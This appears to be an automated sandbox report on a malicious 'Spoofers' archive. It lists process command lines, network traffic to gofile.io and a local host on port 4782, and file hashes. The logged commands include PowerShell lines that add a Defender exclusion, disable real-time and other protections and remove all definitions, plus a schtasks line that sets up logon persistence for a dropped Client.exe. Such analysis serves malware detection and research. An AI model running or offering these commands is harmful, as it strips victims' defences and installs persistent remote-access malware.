| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://gofile.io/d/Vw475K
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9180b46f8,0x7ff9180b4708,0x7ff9180b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap32370:76:7zEvent28521
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Spoofers\READ ME.txt
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Spoofers\Cleaner.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('successfully cleaned', 0, 'cleaner', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Spoofers\Cleaner.exe'
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('successfully cleaned', 0, 'cleaner', 48+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe
"C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ahhaa" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ahhaa" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe
"C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Spoofers\READ ME.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6804 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 45.112.123.126:80 | gofile.io | tcp |
| FR | 45.112.123.126:80 | gofile.io | tcp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 8.8.8.8:53 | 239.123.112.45.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-qv595.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 192.168.1.28:4782 | tcp | |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 82.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lululepu.fr | udp |
| US | 104.21.83.132:80 | lululepu.fr | tcp |
| US | 104.21.83.132:80 | lululepu.fr | tcp |
| US | 104.21.83.132:443 | lululepu.fr | tcp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 8.8.8.8:53 | kit.fontawesome.com | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | tcp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 104.18.40.68:443 | kit.fontawesome.com | tcp |
| US | 8.8.8.8:53 | ka-f.fontawesome.com | udp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 132.83.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.95.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.26.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.169.217.172.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| N/A | 192.168.1.28:4782 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| GB | 64.233.166.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp | |
| US | 8.8.8.8:53 | store5.gofile.io | udp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| US | 8.8.8.8:53 | store6.gofile.io | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 31.14.70.244:443 | store5.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 31.14.70.249:443 | store6.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | 244.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.70.14.31.in-addr.arpa | udp |
| FR | 31.14.70.244:443 | store5.gofile.io | tcp |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp | |
| N/A | 192.168.1.28:4782 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 61cef8e38cd95bf003f5fdd1dc37dae1 |
| SHA1 | 11f2f79ecb349344c143eea9a0fed41891a3467f |
| SHA256 | ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e |
| SHA512 | 6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d |
\??\pipe\LOCAL\crashpad_5068_GAVBZAZWQTBHKOGM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0a9dc42e4013fc47438e96d24beb8eff |
| SHA1 | 806ab26d7eae031a58484188a7eb1adab06457fc |
| SHA256 | 58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151 |
| SHA512 | 868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e59b801f3b70575a7f3d90cbe851dd0c |
| SHA1 | a2356e7e8ae9a5537bf9918f6ed78c44cd19a3b3 |
| SHA256 | ab71116f4d160e60fc1ed2977b05d919478107d06840d3c98940d0e0585cf857 |
| SHA512 | e299a19f5d440fbc584db73ff130c94121cd37ca7b45a356f5fd29eb3ff61ecd9956eb0235c1c03bfb080ebd59face2cb7dff87833528576a0b6b561e662490e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Spoofers.7z
| MD5 | cb7960f8fb08dc1d63269e205e490b03 |
| SHA1 | 184d929681a0d5ae239f148214ee5d070b1adc69 |
| SHA256 | 4fa37e700c2b9ee257995cc82ad1f02b02bf5b031a5fda15ff34277c82239d8a |
| SHA512 | 852ea8344772464f4bdbca2108a33bc156b2c7d99ff40588a07e98c055a996567496196f5f1fe7512a1d8cb7a8e132942f7c1a157ad45fe6314838c13ed5eb12 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 447014687622af7c638e9cac9c8cc5e9 |
| SHA1 | 66a0809c8e07bdc04b75cfd2db5e56107e933f48 |
| SHA256 | 481d1978d5ed5ef3aff61db52e7df1bd012a5acc119900b10c89f14daca4d69d |
| SHA512 | effa14177e5aec30de25d19fd5eb251534d950c1aeccf6fb0f7049b5af348d2ce3324391ecfef4d1669bd1246fe67ff739507535d6251bbc9b175b3f893f410b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f3b481811acda6405732186d771c982b |
| SHA1 | e1cd46fa562bd3e3cea96ea2d4e6d7b6c66de1c3 |
| SHA256 | b192c26494d6ce61c1d6bcebd2f2f33a00afc67c6937d9dcc0ee1ccf211f83cc |
| SHA512 | 6fc9f2653c8bd0a192a8fec27fa8c35d90f181d81b79bad0c220e2e8cc39a3d5e49f151b1c5d775092edee43630866976be3fe76f6381a86707d4c712d33293c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b7c36ce38b436ef25e0fa17e09849bb8 |
| SHA1 | ae5b15ce1e5ab1d7362498dd93c891df386fd5b8 |
| SHA256 | 01d10f6651ce0eb2d424f174d8714d5a63520bc80b1cf3a6a9dfa53612246e7d |
